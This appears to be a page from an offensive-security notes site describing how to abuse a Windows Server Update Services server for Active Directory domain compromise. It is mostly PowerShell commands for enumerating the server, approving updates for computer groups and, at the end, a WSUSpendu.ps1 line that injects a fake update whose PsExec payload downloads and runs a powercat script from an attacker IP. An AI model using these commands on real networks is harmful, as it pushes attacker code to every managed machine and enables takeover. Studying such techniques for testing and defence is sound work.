> For the complete documentation index, see [llms.txt](https://rfc1918.gitbook.io/offsec/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://rfc1918.gitbook.io/offsec/active-directory/privilege-escalation/wsus-server-abuse.md).

# WSUS server abuse

## Get all information about the database

```powershell
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Update Services\Server\setup
```

![](/files/EzplLzuSV4XovJdn06kV)

## Define $wsus

```powershell
[reflection.assembly]::LoadWithPartialName("Microsoft.UpdateServices.Administration")
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer()
```

## View updates

```powershell
$update = $wsus.GetUpdates() | Select -last 1
```

## Get target groups

```powershell
$wsus.GetComputerTargetGroups()
```

![](/files/lO3JHjFGvjt5xf2EpC4E)

## Approve update

```powershell
#Pick a group to approve an update for
$group = $wsus.GetComputerTargetGroups() | ? {$_.Name -eq "Domain Servers"}

#Define the actions available for approving a patch
$all = [Microsoft.UpdateServices.Administration.UpdateApprovalAction]::All
$install = [Microsoft.UpdateServices.Administration.UpdateApprovalAction]::Install
$NotApproved = [Microsoft.UpdateServices.Administration.UpdateApprovalAction]::NotApproved
$Uninstall = [Microsoft.UpdateServices.Administration.UpdateApprovalAction]::Uninstall

#Approve the update
$update.Approve($install,$group)
```

### Using UpdateServices

```powershell
import-module -name UpdateServices
```

Upprove the updates

```powershell
Get-WsusUpdate -Classification All -Approval Unapproved | Approve-WsusUpdate -Action Install -TargetGroupName "All Computers"
```

## Abusing WSUS server for domain compromise\\

Using [WSUSpendu.ps1](https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1)

```powershell
Wsuspendu.ps1 -Inject -PayloadFile c:\Windows\Temp\PsExec64.exe -PayloadArgs '-accepteula -s -d powershell.exe -c "iex(iwr -UseBasicParsing -Uri http://192.168.100.16/powercat_loaded.ps1)"'
```

## References

{% embed url="<https://www.youtube.com/watch?v=2M8ux6ESIAs>" %}

{% embed url="<https://github.com/AlsidOfficial/WSUSpendu>" %}

{% embed url="<https://learn-powershell.net/2010/10/16/wsus-approving-and-declining-updates-with-powershell/>" %}
